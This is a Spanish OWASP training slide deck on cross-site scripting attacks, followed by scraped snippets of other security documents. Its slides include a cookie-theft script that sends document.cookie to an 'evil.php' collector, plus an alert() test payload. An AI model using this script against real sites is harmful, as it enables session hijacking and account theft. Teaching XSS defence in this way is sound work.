Ataques XSS en Aplicaciones Web

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Ataques XSS en Aplicaciones Web"

Transcripción

1 Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones Copyright 2007 The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the License. The Foundation

2 Índice 1. Introducción 2. Conceptos Básicos 3. Definición de ataques XSS 4. Tipos de ataques XSS 5. Fases de un ataque XSS 6. Metodologías de ataques XSS 7. Detectar aplicación web vulnerable a ataques XSS 8. Ejemplos de ataques XSS 9. Contramedidas 2

3 Introducción Cross Site Scripting (XSS) Las vulnerabilidades de XSS abarcaban cualquier ataque que permita ejecutar código de "scripting" en el contexto de otro sitio web. Se pueden encontrar en cualquier aplicación que tenga como objetivo final, el presentar la información en un navegador web. Usualmente no se validan correctamente los datos de entrada que son usados en algunas aplicaciones permitiendo enviar un script malicioso a la aplicación. Para funcionar necesitan un punto de entrada, que suelen ser los formularios. A través de un ataque XSS, se puede secuestrar cuentas, cambiar configuraciones de los usuarios, acceder a partes restringidas del sitio, modificar el contenido del sitio, etc. 3

4 Conceptos Básicos Definición: Ataque Consiste en aprovechar alguna debilidad o vulnerabilidad en el software, en el hardware, e incluso, en las personas que forman parte de un ambiente informático; a fin de obtener un beneficio, causando un efecto negativo en la seguridad del sistema, que luego repercute directamente en los activos de la organización. Efectos negativos como: Denegación de servicio Ejecutar código arbitrario Obtener información confidencial Escalar privilegios Administrar el sistema Tomar el control del mismo Detener o dañar el sistema informático 4

5 Conceptos Básicos Tipos de Ataques Según la forma de actuación: Ataque activo Ataque pasivo Según su procedencia: Interno Externo 5

6 Conceptos Básicos Definición: Vulnerabilidad Hace referencia a una debilidad en un sistema, permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones. Son el resultado de bugs o de fallos en el diseño del sistema. Aunque, en un sentido más amplio, también pueden ser el resultado de las propias limitaciones tecnológicas, porque, en principio, no existe sistema 100% seguro. Por lo tanto existen vulnerabilidades teóricas y vulnerabilidades reales. Las vulnerabilidades en las aplicaciones suelen corregirse con parches o con cambios de versión. Mientras que algunas otras requieren un cambio físico en un sistema informático. 6

7 Conceptos Básicos Definición: Script Los scripts son un conjunto de instrucciones generalmente almacenadas en un archivo de texto que deben ser interpretados línea a línea en tiempo real para su ejecución, se distinguen de los programas, pues estos deben ser convertidos a un archivo binario ejecutable. Los scripts pueden estar embebidos en otro lenguaje para aumentar las funcionalidades de este, como es el caso los scripts PHP o Javascript en código HTML. 7

8 Definición de ataque XSS En qué consisten? Es una vulnerabilidad que aprovecha la falta de mecanismos de filtrado y validación en campos de entrada, permitiendo así el envío de scripts completos (como Visual Basic Scripts o Java Scripts) con secuencias de comandos maliciosos que podrían impactar directamente en el sitio web o en el equipo de un usuario. Esta limitación se debe a que el código HTML se interpreta en el navegador de un usuario y no en el servidor. Así que si alguien inyecta código HTML en alguna aplicación web no podría hacer daño alguno al servidor, ya que éste nunca interpreta el código HTML, sólo los navegadores. Por eso este ataque se denomina: ataque del lado del cliente. 8

9 Definición de ataque XSS En qué consisten? La explotación del ataque se vale de: Datos almacenados en servidor desde el cliente Datos que van a ser visualizados por otros usuarios. Campos de entradas sin protección y ningún tipo de validación Los conocimientos del atacante sobre programación HTML y scripting 9

10 Definición de ataque XSS Riesgos Navegación dirigida Phishing Spyware Robo de credenciales Ejecución de acciones automáticas 10

11 Definición de ataque XSS Recursos para explotar la vulnerabilidad Formularios de contactos de sitios web Mensajes en Foros Firma de libro de visitas Buscadores Variables Correo Web 11

12 Tipos de ataques XSS Ataques Directos El ataque de forma directa de XSS (también llamado XSS persistente), se presenta cuando el atacante consigue embeber código HTML malicioso, directamente en los sitios Webs que así lo permiten. Funciona localizando puntos débiles en la programación de los filtros de HTML si es que existen, para publicar contenido. Este tipo de ataques suele ser el más común, y el código del atacante, se basa en etiquetas HTML (del tipo <frame> o <script>), entre las cuales incluye el código malicioso. 12

13 Tipos de ataques XSS Ataques Indirectos Este tipo de ataques se presenta, cuando el código maligno se inyecta a través de formularios, a través de los parámetros de una URL, programas en Flash, un enlace malicioso e incluso vídeos. Un ejemplo de un XSS indirecto, puede darse a través de un enlace malicioso, del tipo: El resultado muestra una ventana con el texto "hola-mundo". Esta vulnerabilidad suele ser usada para efectuar robo de sesiones y phishing. 13

14 Fases de un ataque XSS Fase 1 Inserción de código HTML: Identificar que código puede introducir Fase 2 Fase 3 Pruebas de Concepto: Qué puede hacer con XSS? Robo de credenciales, alterar el sitio web, etc. Llevar a cabo el daño, robo de credenciales, suplantación de identidad, envío de s falsos, identificación de posibles víctimas, etc. 14

15 Metodologías de ataques XSS Robo de Cookies Mediante esta técnica se puede robar sesiones de una manera bastante sencilla. Bastaría con realizar un script que llamase a una página alojada en nuestro servidor pasándole la cookie. <SCRIPT type="text/javascript"> var adr = '../evil.php?cookiemonster=' + escape(document.cookie); </SCRIPT> Este Script se colaría en el servidor de la victima aprovechando un punto vulnerable a XSS. Cuando un usuario se ha validado en el servidor y ejecute el script se envía al servidor el contenido de la cookie. Una vez que la página obtiene la cookie (almacenándola por ejemplo en un fichero) mediante programas como Odysseus, se puede hacer una llamada al servidor pasándole la cookie original. Esta cookie es válida para robar la sesión solo mientras el usuario no cierre la sesión. 15

16 Metodologías de ataques XSS Variables VulnerabilidadXSS )</script>

17 Metodologías de ataques XSS Buscadores

18 Metodologías de ataques XSS Páginas de error

19 Detectar aplicación web vulnerable a ataques XSS Método Detectar la vulnerabilidad a través de un formulario: <script>alert();</script> Detectar la vulnerabilidad a través de URL: 19

20 Ejemplos de ataques XSS Phishing a la banca electrónica Por mala validación de datos de entrada, un atacante puede conseguir inyectar código, para realizar el robo de credenciales y lograr el acceso a cuentas bancarias. 20

21 Ejemplos de ataques XSS Presidencia Española de la Unión Europea Consiguen alterar la imagen de un Presidente de Gobierno con una imagen errónea, con el fin de dañar la imagen pública de un país. 21

22 Ejemplos de ataques XSS Twitter Se inyectaba código Java Script persistente, a través de un fichero.js alojado en el servidor. El cliente de Twitter no limpiaba el código que venía con las URLs 22

23 Ejemplos de ataques XSS Youtube Los atacantes lograron inyectar código HTML desde el área de comentarios en Youtube. Los hackers hicieron de todo, desde forzar mensajes popup para que aparecieran en el sitio, hasta re direccionar a los usuarios a páginas con malware. 23

24 Ejemplos de ataques XSS Facebook El ataque se basaba en el acceso a través de Java Scripts, de las cookies del usuario de Facebook, logrando re direccionar su contenido a un servidor web controlado por el atacante. Esto permitía al atacante, acceder a los mensajes privados de los usuarios, adicionar nuevas aplicaciones sin autorización, disponer de las imágenes privadas de las víctimas, robar la lista de contactos, etc. 24

25 Contramedidas Diseño de aplicaciones Validar todas las entradas de formularios: Se debe verificar que el tipo de datos y la longitud de cada campo se corresponda con lo esperado. Se deberá filtrar caracteres especiales que puedan resultar peligrosos Se deben programar las aplicaciones web, filtrando determinados comandos. En general en los ataques XSS son usadas etiquetas como SCRIPT, OBJECT, APPLET, EMBED y FORM. Envío de mensajes de alerta intimidatorios, cuando se detecte que un usuario de la aplicación intente un posible ataque. 25

26 Contramedidas Navegadores del lado cliente Otra contramedida, que ayuda a mitigar los ataques XSS, evitando que los usuarios sean víctimas de ellos, es el uso de las versiones más recientes de navegadores web. A partir de Internet Explorer 8, cuando se intenta acceder a una página web que ha sido víctima de un ataque XSS, aparece un mensaje que avisa de que la página web ha sido modificada, para proteger al usuario de un posible ataque. Esto es debido a que el filtro Anti XSS de Internet Explorer ha detectado la manipulación de la página mediante la inyección de código en un parámetro. 26

27 Muchas gracias 27

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es antonio@noveria.es # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,

Más detalles

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web Problemas de seguridad Web Ataques específicos a servidores y clientes web y medidas preventivas. junio de 2014 Problemas de seguridad Web 1 ATAQUES Consiste en aprovechar alguna debilidad o vulnerabilidad

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras

Más detalles

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org

Introducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org Introducción a Ing. Camilo Fernandez Consultor en Seguridad Informática Octubre, 2010 cfernandez@develsecurity.com Copyright 2004 - The Foundation Permission is granted to copy, distribute and/or modify

Más detalles

Por qué han recurrido los cibercriminales a los ataques de JavaScript malicioso

Por qué han recurrido los cibercriminales a los ataques de JavaScript malicioso Por qué han recurrido los cibercriminales a los ataques de Los ataques a sitios web se han convertido en un negocio muy rentable. Antes, los cibercriminales infectaban sitios web para llamar la atención

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Seguridad Informática

Seguridad Informática Universidad Rey Juan Carlos Grado en Ingeniería Informática Seguridad Informática Curso 2012/13 Prueba 3 - Seguridad en es Lea detenidamente las instrucciones del examen antes de comenzar: El examen consta

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com

Más detalles

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS Capítulo 2 Sistemas de Detección de Intrusos 7 CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS En este capítulo se definen los sistemas de detección de intrusos y su relación con los ataques basados en el

Más detalles

SEGURIDAD EN LA WEB.

SEGURIDAD EN LA WEB. SEGURIDAD EN LA WEB. - ELEMENTOS DE PROTECCIÓN: Firewall Elemento de protección que sirve para filtrar paquetes (entrada o salida) de un sistema conectado a una red, que puede ser Internet o una Intranet.

Más detalles

Para nosotros la seguridad es muy importante. A continuación información de utilidad para usted como cliente.

Para nosotros la seguridad es muy importante. A continuación información de utilidad para usted como cliente. Para nosotros la seguridad es muy importante. A continuación información de utilidad para usted como cliente. DEFINICIONES IMPORTANTES QUE DEBE CONOCER: Confidencialidad: hace referencia a que la información

Más detalles

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad. Índice 1. Introducción al XSS. Qué es el XSS? Por qué se produce? Tipos de XSS 2. Taller Práctico Explotando la Vulnerabilidad. XSS Reflejado XSS Persistente 3. Robo de cookies Uso de estas. Como robar

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Guía de doble autenticación

Guía de doble autenticación Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.

Más detalles

Delitos. Informáticos GUÍA DE USUARIO DELITOS INFORMÁTICOS

Delitos. Informáticos GUÍA DE USUARIO DELITOS INFORMÁTICOS GUÍA DE USUARIO DELITOS INFORMÁTICOS El uso de Internet, además de darnos mucha información, también nos ofrece algunos peligros. Al igual que nuestro mundo real, en el mundo virtual también hay gente

Más detalles

Pruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?

Pruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos? Venezuela The Foundation http://www.owasp.org Chapter Pruebas de Seguridad en aplicaciones web segun Donde estamos... Hacia donde vamos? Edgar D. Salazar T Venezuela Chapter Leader edgar.salazar@owasp.org

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

ARE YOUR WEB VULNERABLE?

ARE YOUR WEB VULNERABLE? CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

PROGRAMACIÓN PÁGINAS WEB CON PHP

PROGRAMACIÓN PÁGINAS WEB CON PHP PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

Inseguridad de los sistemas de autenticación en aplicaciones web

Inseguridad de los sistemas de autenticación en aplicaciones web Barcelona, 18 de Marzo Inseguridad de los sistemas de autenticación Vicente Aguilera Díaz vaguilera@isecauditors.com Contenido 0. Introducción al sistema de autenticación 2. Medidas de protección 3. Referencias

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

Guía del empleado seguro

Guía del empleado seguro Guía del empleado seguro INTRODUCCIÓN La seguridad de la información en una empresa es responsabilidad del departamento de IT (tecnologías de la información) o del propio área de Seguridad de la Información

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

Seguridad de un Portal

Seguridad de un Portal Seguridad de un Portal 5 de noviembre, 2010 Gabriel Fernández NyF@agesic.gub.uy Qué debemos proteger? Información Disponibilidad http://moplincom.moplin.com/wp-content/uploads/2009/08/joke-redes1.jpg 2

Más detalles

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1 Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación

Más detalles

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................

Más detalles

abacformacio@abacformacio.com

abacformacio@abacformacio.com Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15 Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN

Más detalles

Kaspersky Fraud Prevention for Endpoints

Kaspersky Fraud Prevention for Endpoints Kaspersky Fraud Prevention for Endpoints www.kaspersky.es KASPERSKY FRAUD PREVENTION 1. Formas de atacar a la banca online El primer motivo del cibercrimen es hacer dinero y las sofisticadas bandas criminales

Más detalles

Capítulo V. Seguridad de un portal

Capítulo V. Seguridad de un portal Capítulo V Seguridad de un portal Capítulo V Seguridad del portal 261 Seguridad del Portal Los portales WEB se ven expuestos a un creciente número de amenazas y vulnerabilidades que pueden afectar la

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

Implantación de Aplicaciones Web Fecha: 20-09-13

Implantación de Aplicaciones Web Fecha: 20-09-13 Página 1 de 24 RESUMEN DE LA PROGRAMACIÓN ADMINISTRACIÓN DE SISTEMAS INFORMÁTICOS EN RED CURSO AC. 2012 / 2013 ÁREA / MATERIA / MÓDULO PROFESIONAL Implantación de Aplicaciones Web (84 horas 4 horas semanales)

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

Explotando un RFI en una WebApp Comercial

Explotando un RFI en una WebApp Comercial Explotando un RFI en una WebApp Comercial A. Alejandro Hernández (nitr0us) nitrousenador@gmail.com Safer Operations Consulting www.saferops.com.mx RTM Security Research Group www.zonartm.org Noviembre

Más detalles

Para nosotros la seguridad es muy importante. A continuación información de utilidad para usted como cliente.

Para nosotros la seguridad es muy importante. A continuación información de utilidad para usted como cliente. Para nosotros la seguridad es muy importante. A continuación información de utilidad para usted como cliente. DEFINICIONES IMPORTANTES QUE DEBE CONOCER: Confidencialidad: hace referencia a que la información

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

==== Introducción. ==== Buscando un fallo

==== Introducción. ==== Buscando un fallo =============================== Horde/Imp: Cross Site Scripting in Email Subject =============================== FraMe - frame at kernelpanik.org http://www.kernelpanik.org ===============================

Más detalles

Servicio de Protección Total Web

Servicio de Protección Total Web Servicio de Protección Total Web Prevención de Fraude Inspecciones de Procesos, Tecnología, Personas y Lugares, Ethical hacking, Concientización y Capacitación en Seguridad Detección de Fraude Ambientes

Más detalles

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

Evolución de los bankers

Evolución de los bankers Autor: Sebastián Bortnik, Analista de Seguridad de ESET para Latinoamérica Fecha: Lunes 04 de mayo del 2009 ESET, LLC 610 West Ash Street, Suite 1900 phone: (619) 876 5400, fax: (619) 437 7045 sales@eset.com,

Más detalles

Reputació n Web. Actualmente la forma por la que se infectan los equipos puede ocurrir, como norma general, de tres formas distintas:

Reputació n Web. Actualmente la forma por la que se infectan los equipos puede ocurrir, como norma general, de tres formas distintas: Aprobado en Consejo Informático 19-3-2013 - OFFICESCAN Reputació n Web Contexto y situación actual Actualmente la forma por la que se infectan los equipos puede ocurrir, como norma general, de tres formas

Más detalles

Programación páginas web JavaScript y PHP

Programación páginas web JavaScript y PHP Programación páginas web JavaScript y PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la

Más detalles

TEMA 3. SEGURIDAD INFORMÁTICA

TEMA 3. SEGURIDAD INFORMÁTICA TEMA 3. SEGURIDAD INFORMÁTICA 1. SEGURIDAD INFORMÁTICA 2. CONTRA QUÉ NOS DEBEMOS PROTEGER? 3. SEGURIDAD ACTIVA Y PASIVA 4. LAS AMENAZAS SILENCIOSAS 5. LOS PROGRAMAS QUE PROTEGEN NUESTRO ORDENADOR a. El

Más detalles

MINT A NIVEL BROSERW CON BEEF

MINT A NIVEL BROSERW CON BEEF MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad

Más detalles

Web Application exploiting and Reversing Shell

Web Application exploiting and Reversing Shell OWASP Perú Chapter Meeting The OWASP Foundation http://www.owasp.org Web Application exploiting and Reversing Shell Juan Oliva @jroliva jroliva@gmail.com Copyright The OWASP Foundation Permission is granted

Más detalles

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones

Más detalles

Microsoft Security Intelligence Report

Microsoft Security Intelligence Report Microsoft Security Intelligence Report Volumen 12 JULIO DICIEMBRE DE 2011 PRINCIPALES CONCLUSIONES www.microsoft.com/sir Microsoft Security Intelligence Report Este documento se publica exclusivamente

Más detalles

PHP 5.6 Desarrollar un sitio web dinámico e interactivo

PHP 5.6 Desarrollar un sitio web dinámico e interactivo Introducción 1. Objetivo del libro 9 2. Breve historia de PHP 10 3. Dónde conseguir PHP? 10 4. Convenciones de escritura 11 Información general sobre PHP 1. Qué es PHP? 13 2. Estructura básica de una página

Más detalles

La gestión de la seguridad informática. La gestión de la seguridad informática. Contenido. Consideraciones 22/03/2013

La gestión de la seguridad informática. La gestión de la seguridad informática. Contenido. Consideraciones 22/03/2013 La gestión de la seguridad informática 1 Contenido La gestión de la seguridad información. 2 Hacking ético 3 Hacking Víctor Cuchillac La gestión de la seguridad informática Consideraciones Por dónde empezamos?

Más detalles

Seguridad en Servicios de Hosting

Seguridad en Servicios de Hosting Tendencias de la Tecnología en Seguridad Informática 2009 Seguridad en Servicios de Hosting Juan Pablo Perez Etchegoyen jppereze@cybsec.com 16 de Septiembre de 2009 Buenos Aires - Argentina Agenda Introducción

Más detalles

Programación páginas web JavaScript y PHP

Programación páginas web JavaScript y PHP PRESENTACIÓN Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor

Más detalles

Cláusula de Exención de Responsabilidad

Cláusula de Exención de Responsabilidad Cláusula de Exención de Responsabilidad Ámbito y objeto de la web El Ayuntamiento de Huéscar ofrece a través del dominio www.huescar.es información de interés general del municipio, y en particular información

Más detalles

GUÍA DE AMENAZAS. Las diez amenazas más peligrosas de Internet

GUÍA DE AMENAZAS. Las diez amenazas más peligrosas de Internet GUÍA DE AMENAZAS Botnet Su accionar consiste en formar una red o grupo de computadoras zombis (infectados con malware), que son controlados por el propietario de los bots (atacante). Es decir, toman control

Más detalles

www.microsoft.com/sir

www.microsoft.com/sir www.microsoft.com/sir Este documento tiene fines exclusivamente informativos. MICROSOFT NO OTORGA NINGUNA GARANTÍA, YA SEA EXPRESA, IMPLÍCITA O PREVISTA POR LEY, CON RESPECTO A LA INFORMACIÓN CONTENIDA

Más detalles

OWAND 11 Granada Ingeniería social

OWAND 11 Granada Ingeniería social OWAND 11 Granada Ingeniería social OWASP Education Project David Montero Abujas OWASP Andalucia Chapter Leader Grupo isoluciones david.montero@owasp.org Twiitter:@raistlinthemage Copyright 2007 The OWASP

Más detalles

Servicios de Seguridad de la Información

Servicios de Seguridad de la Información Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos

Más detalles

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas Problemas más comunes y principales contramedidas Seguridad en aplicaciones web Problemas más comunes y principales contramedidas Fernando de la Villa Gerente de Soluciones Area Seguridad Mnemo Evolution

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Requisitos de control de proveedores externos

Requisitos de control de proveedores externos Requisitos de control de proveedores externos Ciberseguridad Para proveedores clasificados como de bajo riesgo de ciberdelito 1. Protección de activos y configuración de sistemas Los Datos de Barclays,

Más detalles

Novedades ebd versión 3.2

